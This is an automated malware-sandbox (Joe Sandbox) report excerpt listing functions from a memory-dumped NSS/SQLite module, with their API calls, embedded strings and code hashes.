Part of subcall function 6CEE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CEE07E6
Part of subcall function 6CEE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE081B
Part of subcall function 6CEE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE0825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CEE8072
SECOID_FindOID_Util.NSS3 ref: 6CEE80F5

Part of subcall function 6CEEBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CEE800A,00000000,?,00000000,?), ref: 6CEEBC3F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: 8002e5a50ec8c56e550f14edcd1160422aeb5e6b2b23a32fe89795422f0c0e2b
Instruction ID: 088c7973a6f8b8f6cd1308af11a94f6fb355775b110d986f12213debbebaf22b
Opcode Fuzzy Hash: 8002e5a50ec8c56e550f14edcd1160422aeb5e6b2b23a32fe89795422f0c0e2b
Instruction Fuzzy Hash: A7E18F716053019FE710CF28D880B5A77F5AF4938CF25496DE89A9BB62E731EC05CB92

Function 6CE71C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6CE71C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6CE71C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6CE71CA1
GetLengthSid.ADVAPI32(?), ref: 6CE71CA9
malloc.MOZGLUE(00000000), ref: 6CE71CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6CE71CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CE71CE4
GetLengthSid.ADVAPI32(?), ref: 6CE71CEC
malloc.MOZGLUE(00000000), ref: 6CE71CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6CE71D0F
CloseHandle.KERNEL32(?), ref: 6CE71D17
AllocateAndInitializeSid.ADVAPI32 ref: 6CE71D4D
GetLastError.KERNEL32 ref: 6CE71D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CE71D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CE71D7A

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: 4e9a7e53888ccb63064cedfba15e4f51278ba99184cd80d68b35562cfc28f41c
Instruction ID: e1284ec6f38c6316de4db6e835c472524c0165f0a4b7bea9f95febe3f01d9f18
Opcode Fuzzy Hash: 4e9a7e53888ccb63064cedfba15e4f51278ba99184cd80d68b35562cfc28f41c
Instruction Fuzzy Hash: 513163B5E10218AFEF90AF74CD48BAA7BB8FF4A345F0041A5F609D2251E7306994CF65

Function 6CE73D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CE73DFB
__allrem.LIBCMT ref: 6CE73EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE73FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6CE74047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CE740DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE7415F
__allrem.LIBCMT ref: 6CE7416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE74288
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE742AB
__allrem.LIBCMT ref: 6CE742B7

Strings

%02d, xrefs: 6CE74086
%lld, xrefs: 6CE73FB2
%04d, xrefs: 6CE7407B
%03d, xrefs: 6CE742E8

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: db9a038dc1d987ad660c1235e1eecda9de1fbbe6ea1803602256a86445fb3e34
Instruction ID: ab8fae73c03347cc6739758108e1d48b3706209c5e268b08df747b575a22d2bb
Opcode Fuzzy Hash: db9a038dc1d987ad660c1235e1eecda9de1fbbe6ea1803602256a86445fb3e34
Instruction Fuzzy Hash: DBF1E271A087409FD725CF38C841BAAB7F6AF86348F248A1EF48597B51E730D846CB52

Function 6CE7EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE7EF63

Part of subcall function 6CE887D0: PORT_NewArena_Util.NSS3(00000800,6CE7EF74,00000000), ref: 6CE887E8
Part of subcall function 6CE887D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6CE7EF74,00000000), ref: 6CE887FD
Part of subcall function 6CE887D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CE8884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6CE7F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE7F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6CE7F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6CE7F374
PL_strcasecmp.NSS3(6CFC2FD4,?), ref: 6CE7F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6CE7F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CE7F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CE7F67D
CERT_DestroyName.NSS3(?), ref: 6CE7F68B

Part of subcall function 6CE88320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6CE88338
Part of subcall function 6CE88320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CE88364
Part of subcall function 6CE88320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6CE8838E
Part of subcall function 6CE88320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE883A5
Part of subcall function 6CE88320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE883E3

Part of subcall function 6CE884C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6CE884D9
Part of subcall function 6CE884C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CE88528

Part of subcall function 6CE88900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6CE7F599,?,00000000), ref: 6CE88955

Strings

oid., xrefs: 6CE7F2CF
*, xrefs: 6CE7F3C6
", xrefs: 6CE7F21B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 2ea0e7c20a61f5f4e80e9cb61ccffd80acd7578de082fa687037c3fc1f13d35b
Instruction ID: f30329aeac91d58b9ff1e6fd560ee1534f2f7869d18957f4baeb02d501bbe44d
Opcode Fuzzy Hash: 2ea0e7c20a61f5f4e80e9cb61ccffd80acd7578de082fa687037c3fc1f13d35b
Instruction Fuzzy Hash: AB222A7160C3518FD724CE68C49076AB7F6AB8531CF38462DE49587B91E7399C06C7A3

Function 6CE21C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE21D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE21EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6CE21FB7

Strings

unsupported file format, xrefs: 6CE22188
attached databases must use the same text encoding as main database, xrefs: 6CE220CA
sqlite_temp_master, xrefs: 6CE21C5C
another row available, xrefs: 6CE22287
table, xrefs: 6CE21C8B
unknown error, xrefs: 6CE22291
sqlite_master, xrefs: 6CE21C61
abort due to ROLLBACK, xrefs: 6CE22223
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6CE21F83
no more rows available, xrefs: 6CE22264

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: 9e22aae93f773dcfb95fac743b2044e3a245c856218f32b062e2f5f842cec5f1
Instruction ID: 7915856d069a2301ec72709e20012f477dd9f230f3e589f75f036e563fb1ce2d
Opcode Fuzzy Hash: 9e22aae93f773dcfb95fac743b2044e3a245c856218f32b062e2f5f842cec5f1
Instruction Fuzzy Hash: 5D12D2716083418FD714CF19C484B1AB7F2BF95328F28856DE8959BB52D736EC46CB82

Function 6CE45F20 Relevance: 22.5, APIs: 5, Strings: 8, Instructions: 3043COMMON

Download Yara Rule

Strings

-, xrefs: 6CE46228
NOCASE, xrefs: 6CE48703
u, xrefs: 6CE481DA
sub-select returns %d columns - expected %d, xrefs: 6CE4805F
ON clause references tables to its right, xrefs: 6CE46BEC
2, xrefs: 6CE465B4
BINARY, xrefs: 6CE48708, 6CE48737, 6CE487B8
-, xrefs: 6CE462F9

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID:
String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
API String ID: 0-3593521594
Opcode ID: 098cbfe6ea2b83176177fd6b792d86f4bb7f40c88fd172f9995159dd2e26547b
Instruction ID: 48949e462821de472184bf24c8ae161d2e3ecdd48f6bebb8b0e1e076af483af8
Opcode Fuzzy Hash: 098cbfe6ea2b83176177fd6b792d86f4bb7f40c88fd172f9995159dd2e26547b
Instruction Fuzzy Hash: C1439174A083418FD714CF19D490A1AB7F2BF8931CF24CA6DE8998B752D735E846CB92

Function 6CEEEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CEEC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CEEDAE2,?), ref: 6CEEC6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CEEF0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CEEF0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6CEEF101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CEEF11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CFB218C), ref: 6CEEF183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6CEEF19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CEEF1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CEEF1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CEEF210

Part of subcall function 6CE952D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6CEEF1E9,?,00000000,?,?), ref: 6CE952F5
Part of subcall function 6CE952D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6CE9530F
Part of subcall function 6CE952D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6CE95326
Part of subcall function 6CE952D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6CEEF1E9,?,00000000,?,?), ref: 6CE95340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CEEF227

Part of subcall function 6CEDFAB0: free.MOZGLUE(?,-00000001,?,?,6CE7F673,00000000,00000000), ref: 6CEDFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6CEEF23E

Part of subcall function 6CEDBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CE8E708,00000000,00000000,00000004,00000000), ref: 6CEDBE6A
Part of subcall function 6CEDBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CE904DC,?), ref: 6CEDBE7E
Part of subcall function 6CEDBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CEDBEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CEEF2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CEEF3A8

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CEEF3B3

Part of subcall function 6CE92D20: PK11_DestroyObject.NSS3(?,?), ref: 6CE92D3C
Part of subcall function 6CE92D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CE92D5F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 494c3fa5bd00d94ed02c367b9322d3db471aa1564d3f352ef1781e76daded513
Instruction ID: 3cd846f2e1270a40fcf8cd34079d19ff13a61478098b9124e884d122af1bd4a6
Opcode Fuzzy Hash: 494c3fa5bd00d94ed02c367b9322d3db471aa1564d3f352ef1781e76daded513
Instruction Fuzzy Hash: B0D18DB6E016059FEB14CFA9E880A9EB7F5EF4C34CF258029D915A7711EB35E806CB50

Function 6CF1DE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6CEF7FFA,00000000,?,6CF223B9,00000002,00000000,?,6CEF7FFA,00000002), ref: 6CF1DE33

Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490AB
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490C9
Part of subcall function 6CF49090: EnterCriticalSection.KERNEL32 ref: 6CF490E5
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF49116
Part of subcall function 6CF49090: LeaveCriticalSection.KERNEL32 ref: 6CF4913F

Part of subcall function 6CF1D000: PORT_ZAlloc_Util.NSS3(00000108,?,6CF1DE74,6CEF7FFA,00000002,?,?,?,?,?,00000000,6CEF7FFA,00000000,?,6CF223B9,00000002), ref: 6CF1D008

PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6CEF7FFA,00000000,?,6CF223B9,00000002,00000000,?,6CEF7FFA,00000002), ref: 6CF1DE57
memset.VCRUNTIME140(?,00000000,00000088), ref: 6CF1DEA5
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CF1E069
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CF1E121
PK11_FreeSymKey.NSS3(?), ref: 6CF1E14F
PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6CF1E195
PR_GetCurrentThread.NSS3 ref: 6CF1E1FC

Part of subcall function 6CF12460: PR_SetError.NSS3(FFFFE005,00000000,6CFB7379,00000002,?), ref: 6CF12493

Strings

application data, xrefs: 6CF1DFE0
key, xrefs: 6CF1E046
handshake data, xrefs: 6CF1DFF7
early application data, xrefs: 6CF1DFC9

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
String ID: application data$early application data$handshake data$key
API String ID: 1461918828-2699248424
Opcode ID: c35ffa66eef025fb82fe017ae2130a955efb1171b64cee057d85abee70686d91
Instruction ID: d2c0e6282f78cd70a9199527ecbf4b817e1abf33799b2d6d3e772cbf19b3bb99
Opcode Fuzzy Hash: c35ffa66eef025fb82fe017ae2130a955efb1171b64cee057d85abee70686d91
Instruction Fuzzy Hash: C6C10571B042159FEB04CF65CC84BEAB7B4FF09318F184129E909ABE91E731E954CBA1

Function 6CE0ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE0ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE0EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE0EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6CE0EF98

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE0F483
database corruption, xrefs: 6CE0F48D
%s at line %d of [%.10s], xrefs: 6CE0F492

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: d636427576290a0976fb69ea291313f285bb47a6a9a7d89577ee3627cc40e481
Instruction ID: 421f1a92a76a37edbfadbd715d7df23f0c950e67c100c33be67536a75239c75e
Opcode Fuzzy Hash: d636427576290a0976fb69ea291313f285bb47a6a9a7d89577ee3627cc40e481
Instruction Fuzzy Hash: B062D070B046458FDB04CF64C48079ABBB2BF4531CF2841ADD8856BB92D739E8A6CBD5

Function 6CEAFC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6CEAFD06

Part of subcall function 6CEAF670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6CEAF696
Part of subcall function 6CEAF670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6CEAF789
Part of subcall function 6CEAF670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6CEAF796
Part of subcall function 6CEAF670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6CEAF79F
Part of subcall function 6CEAF670: SECITEM_DupItem_Util.NSS3 ref: 6CEAF7F0

Part of subcall function 6CED3440: PK11_GetAllTokens.NSS3 ref: 6CED3481
Part of subcall function 6CED3440: PR_SetError.NSS3(00000000,00000000), ref: 6CED34A3
Part of subcall function 6CED3440: TlsGetValue.KERNEL32 ref: 6CED352E
Part of subcall function 6CED3440: EnterCriticalSection.KERNEL32(?), ref: 6CED3542
Part of subcall function 6CED3440: PR_Unlock.NSS3(?), ref: 6CED355B

SECITEM_DupItem_Util.NSS3(?), ref: 6CEAFDAD

Part of subcall function 6CEDFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CE89003,?), ref: 6CEDFD91
Part of subcall function 6CEDFD80: PORT_Alloc_Util.NSS3(A4686CEE,?), ref: 6CEDFDA2
Part of subcall function 6CEDFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CEE,?,?), ref: 6CEDFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CEAFE00

Part of subcall function 6CEDFD80: free.MOZGLUE(00000000,?,?), ref: 6CEDFDD1

Part of subcall function 6CECE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CECE5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEAFEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6CEAFEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6CEAFED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CEAFF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CEAFF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6CEAFF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CEAFFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6CEB0007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CEB0029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CEB0044

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: c55858a6c00f3d450709de0689826734cda5bbe0bc137fdcbf67d41be6baaa33
Instruction ID: 5368e42d042064f9b5a0da74f7afc68b24e950aedd05ff7575f85d8e9b25dc23
Opcode Fuzzy Hash: c55858a6c00f3d450709de0689826734cda5bbe0bc137fdcbf67d41be6baaa33
Instruction Fuzzy Hash: EFB1D5B1604301AFE304CF69C841A6AB7F5FF8831CF258A1DE9998BB41E774E945CB91

Function 6CEA7D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6CEA7DDC

